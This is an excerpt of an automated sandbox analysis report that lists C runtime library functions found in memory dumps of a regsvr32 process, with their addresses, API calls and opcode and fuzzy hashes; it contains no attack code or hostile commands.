                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67da6000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                  • Instruction ID: 294a225bc51c7c4e5f997f40f4a34c8ad51d04cc4047ed82cb86c5b61e49b489
                                                                                                                                                                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                  • Instruction Fuzzy Hash: E3118E73340200DFDB14CF59DC80EA6B3AAFB9D274B298466ED08CB311E676E851C7A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67DA70BE, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.587551185.0000000067DA6000.00000040.00020000.sdmp, Offset: 67DA6000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67da6000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                  • Instruction ID: 306309f7354712415fa16f02080f1f36ce8403445356dc06dd8f8890204a7947
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01DE32304201DFE705CB2DE884D69FBE8FBCA330B15947EC446C7619E224E846CA60
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3359F, Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlDecodePointer.NTDLL(?), ref: 67D335A7
                                                                                                                                                                  • _free.LIBCMT ref: 67D335C0
                                                                                                                                                                    • Part of subcall function 67D33DA6: HeapFree.KERNEL32(00000000,00000000,?,67D3206D,00000000,00000001,00000000,?,?,?,67D2D916,67D2B7A5), ref: 67D33DBA
                                                                                                                                                                    • Part of subcall function 67D33DA6: GetLastError.KERNEL32(00000000,?,67D3206D,00000000,00000001,00000000,?,?,?,67D2D916,67D2B7A5), ref: 67D33DCC
                                                                                                                                                                  • _free.LIBCMT ref: 67D335D3
                                                                                                                                                                  • _free.LIBCMT ref: 67D335F1
                                                                                                                                                                  • _free.LIBCMT ref: 67D33603
                                                                                                                                                                  • _free.LIBCMT ref: 67D33614
                                                                                                                                                                  • _free.LIBCMT ref: 67D3361F
                                                                                                                                                                  • _free.LIBCMT ref: 67D33643
                                                                                                                                                                  • RtlEncodePointer.NTDLL(67DA5980), ref: 67D3364A
                                                                                                                                                                  • _free.LIBCMT ref: 67D3365F
                                                                                                                                                                  • _free.LIBCMT ref: 67D33675
                                                                                                                                                                  • _free.LIBCMT ref: 67D3369D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3064303923-0
                                                                                                                                                                  • Opcode ID: 5d38af8439c472d8258e91cf97d8167a79c52c2f006914598776bc1621617c53
                                                                                                                                                                  • Instruction ID: 5b297e6ba1fcfb1794a3c413de295173fae07ce9103061f8abc5687d910bfc16
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d38af8439c472d8258e91cf97d8167a79c52c2f006914598776bc1621617c53
                                                                                                                                                                  • Instruction Fuzzy Hash: FB215E71907671DFEE904F34EA42D19B7A4BB4FB343150D2AE5169B340CB3998818B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D32996, Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1442030790-0
                                                                                                                                                                  • Opcode ID: 0e6f461ce93a4bd834e44a146061b5e8890ff594ff41cbeb0a238302037d8781
                                                                                                                                                                  • Instruction ID: 07e778a43e8ca61f9107bbab534575561e4322fc0d7f259ab9e4bfcee4ba7f8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e6f461ce93a4bd834e44a146061b5e8890ff594ff41cbeb0a238302037d8781
                                                                                                                                                                  • Instruction Fuzzy Hash: 13219236948631EBE7619F65DE01E4BFBE4DF4B77CF108C29E59456160EB32A40086F2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D32A6D, Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3432600739-0
                                                                                                                                                                  • Opcode ID: 2b43a7497c7f599a526524c2e1fbe53f2c6295f5bf7bb7344e1b22cc207cc77d
                                                                                                                                                                  • Instruction ID: 121cc64845e1b09ad92c64c17281f6e4470b71339cb0f766aac9ee9362633410
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b43a7497c7f599a526524c2e1fbe53f2c6295f5bf7bb7344e1b22cc207cc77d
                                                                                                                                                                  • Instruction Fuzzy Hash: FB41A432804325EFDB00DFA8D881B8DF7B5BF4E33CF108D29EA1556140DB76A5459BA6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3212F, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 67D3212F
                                                                                                                                                                    • Part of subcall function 67D337EA: RtlEncodePointer.NTDLL(00000000), ref: 67D337ED
                                                                                                                                                                    • Part of subcall function 67D337EA: __initp_misc_winsig.LIBCMT ref: 67D33808
                                                                                                                                                                    • Part of subcall function 67D337EA: GetModuleHandleW.KERNEL32(67CD30D8,?,67DA3798,00000008,67DA4008,67DA354C,?,00000001), ref: 67D35B99
                                                                                                                                                                  • __mtinitlocks.LIBCMT ref: 67D32134
                                                                                                                                                                  • __mtterm.LIBCMT ref: 67D3213D
                                                                                                                                                                    • Part of subcall function 67D321A5: RtlDeleteCriticalSection.NTDLL(?), ref: 67D38218
                                                                                                                                                                    • Part of subcall function 67D321A5: _free.LIBCMT ref: 67D3821F
                                                                                                                                                                    • Part of subcall function 67D321A5: RtlDeleteCriticalSection.NTDLL(67DA4D40), ref: 67D38241
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D32162
                                                                                                                                                                  • __initptd.LIBCMT ref: 67D32184
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 67D3218B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1551663144-0
                                                                                                                                                                  • Opcode ID: b755127628fdf4c1f989ceecb6dcea50f5cb8fd082aa61857ceb91876b8fed8c
                                                                                                                                                                  • Instruction ID: 863f5976dc6ed77e78d5465c7964831340df37a61b6de166e83a27336d6dff06
                                                                                                                                                                  • Opcode Fuzzy Hash: b755127628fdf4c1f989ceecb6dcea50f5cb8fd082aa61857ceb91876b8fed8c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0963290D73199F654EB74AE01A4BAA949F0F63CB210E2DE7B4D50D4FF15A44181F6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D32220, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsnlen
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                                                                                  • Opcode ID: 0768a93f5c8c2d00117fda8448dd4fc65d512c89acc6998383660b70507daa8e
                                                                                                                                                                  • Instruction ID: 7235c38bad45884b99d751feccd1cf96880e050039c0e953d75fc3da7dd8ffbb
                                                                                                                                                                  • Opcode Fuzzy Hash: 0768a93f5c8c2d00117fda8448dd4fc65d512c89acc6998383660b70507daa8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 62210E32948118AAEB00CBA49C45F7AF3ACDB4F779F504865FA58D6180FB71F94086E5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3F768, Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc.LIBCMT ref: 67D3F774
                                                                                                                                                                    • Part of subcall function 67D34E76: __FF_MSGBANNER.LIBCMT ref: 67D34E8D
                                                                                                                                                                    • Part of subcall function 67D34E76: __NMSG_WRITE.LIBCMT ref: 67D34E94
                                                                                                                                                                    • Part of subcall function 67D34E76: RtlAllocateHeap.NTDLL(67DA59B8,00000000,00000001), ref: 67D34EB9
                                                                                                                                                                  • _free.LIBCMT ref: 67D3F787
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1020059152-0
                                                                                                                                                                  • Opcode ID: 6b3c5398058a67778cbffa042768203ff11749992bce0b23a6406648119114e6
                                                                                                                                                                  • Instruction ID: 4fb37175319bfaf3b604208857649ef0ff13a019baac8826be10c19f54cae931
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b3c5398058a67778cbffa042768203ff11749992bce0b23a6406648119114e6
                                                                                                                                                                  • Instruction Fuzzy Hash: B811CAB290933DEFDB111F74984465AF7D9AF0F3BAF104D25FAC8AA140DB3884408AE5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D4CB5F, Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 67D4CB95
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 67D4CBC3
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 67D4CBF1
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 67D4CC27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  • Opcode ID: 7e0466313dee547bf5ce3efc5a565925e74ee89c32c6f78c40a1bf4487b531d5
                                                                                                                                                                  • Instruction ID: 7a2a46b5651b63a50b9a510851dd362bb290d31ca6471a6852e3cd31dadd90b3
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e0466313dee547bf5ce3efc5a565925e74ee89c32c6f78c40a1bf4487b531d5
                                                                                                                                                                  • Instruction Fuzzy Hash: F331D23060425AEFDB218F75C844B6ABFB5FF49320F014A59E8A8971A4E731D854DBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3730F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                  • Instruction ID: f64d95b01715129367cba26b5813ffff916cdfe31958521560f16f9e2a93521a
                                                                                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                  • Instruction Fuzzy Hash: 7701253244059EFBCF025F84CC819EE7F26BB1E264B458915FE6898120C33AD5B1AB92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D36324, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___BuildCatchObject.LIBCMT ref: 67D3633B
                                                                                                                                                                    • Part of subcall function 67D36A30: ___BuildCatchObjectHelper.LIBCMT ref: 67D36A62
                                                                                                                                                                    • Part of subcall function 67D36A30: ___AdjustPointer.LIBCMT ref: 67D36A79
                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 67D36352
                                                                                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 67D36364
                                                                                                                                                                  • CallCatchBlock.LIBCMT ref: 67D36388
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2901542994-0
                                                                                                                                                                  • Opcode ID: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
                                                                                                                                                                  • Instruction ID: cc0df1af0f74a5dcb7a062917b184f4c090b8d9299350ece40ef916f55ad1b9a
                                                                                                                                                                  • Opcode Fuzzy Hash: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 40010532000118EBCF125F55CC00E9EBBBAEF4E728F158414FA6866120E336E461ABA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%